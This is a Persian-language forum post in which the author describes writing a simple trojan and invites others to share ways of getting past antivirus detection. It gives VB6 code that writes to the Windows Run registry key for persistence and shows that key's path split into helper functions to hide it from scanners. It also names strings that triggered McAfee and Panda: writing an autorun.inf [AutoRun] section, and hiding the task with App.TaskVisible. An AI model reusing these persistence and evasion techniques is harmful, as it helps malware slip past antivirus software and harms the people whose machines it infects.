◄◄بحث در رابطه با هوش مصنوعی آنتی ویروسها
سلام دوستاناین بحث را به این دلیل باز کردم تا هر کس هر اطلاعاتی در رابطه با دور زدن و فریب دادن یا روش کار آنتی ویروس ها مطلبی میدونه در اینجا بازگو کنهنکته :در مورد ازکار انداختن آنتی ویروس ها بحث نکنید لطفا( گناه دارن به خدا)تجربه خود من در رابطه با دور زدن:
- استفاده نکردن از کد هایی که در بیشتر ویروسها استفاده میشه برای مثال:
Set Reg = CreateObject("wscript.shell")Reg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"که زیاد تو ویروس ها از این کد استفاده میشهمی شه به جای این از API استفاده کرد یا شاید یه راه سوم که من نمی دونم؟!
- کد کردن مسیر های حساس که در بیشتر ویروس ها به کار میرود مانند:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runامروزه بیشتر ویروس ها از این مسیر در رجیستری برای اجرا شدن در هنگام بالا آمدن ویندوز استفاده می کنندو بعضی از آنتی ویروس ها به این مسیر حساس هستند و بهترین راه برای فریب دادن کد کردن مسیرهست و به خوبی جواب میده برای مثال: این روش کد گذاری من هست (شما می تونید از یه روش بهتر استفاده کنید) :Call Reg_SzCreate(Environ("systemroot") + "\System32\explorer.exe", "MS_Windows", "Software\microsoft\windows\currentversion\" + R1("1") + R2("2") + R3("3"), &H80000002)
':::::::::::::::::::::::::::Run Coder::::::::::::::
Private Function R2(r As String) As String
If r = "2" Then R2 = "u"
End Function
Private Function R3(r As String) As String
If r = "3" Then R3 = "n"
End Function
Private Function R1(r As String) As String
If r = "1" Then R1 = "r"
End Function
نکته:این کد ناقص است فقط به کد گذاری مسیر رجیستری توجه کنیدولی زیاد به آنتی ویروس سخت گرفتم چون اگه به طور کل “Run” می زاشتم داخل یه متغیر باز هم آنتی ویروس جواب نمی دادعبارتهای دیگری هم هستند که آنتی ویرسها به آنها حساس هستندمثلا : چند وقت پیش که یه تروجان(ویروس) ساده می نوشتم وقتی کار کاملا تمام شده بود با 38 عدد آنتی ویروس به روز اسکن کردم که چند تا از آنها فایل رو به عنوان فایل مشکوک شناسایی کردن(HEUR/Malware ) و یکیدو تا به عنوان ویروس روش یه اسمی گذاشته بودن بعد از یه کم دستکاری و کد گذاری هنوز دو تا آنتی ویروس از شرکت مکافیشناسایی میکردن(McAfee+Artemis و McAfee )که بعد از کلی ور رفتن فهمیدم به این عبارت حساس بودنPrint #FileNum, “[AutoRun]”که مربوط به قسمت فایل Autorun.inf میشد که بعد از کد شدن این خط مکافی هم نتونست شناساییش کنهیه ورژن از آنتی ویروس پاندا بود که به این کد حساس بودApp.TaskVisible = Falseاین جور دستوراتو می شه کد کرد؟!فکر نکنمجالب اینجاست که وقتی به این شکل هم در آوردم باز هم فکر میکرد(آنتی ویروسها که فکر نمی کنند) فایل مشکوکهMe.Caption = "App.TaskVisible"حال نوبت شماست!
.gif "N Aggressive (17)")
جواب بصورت نقل قول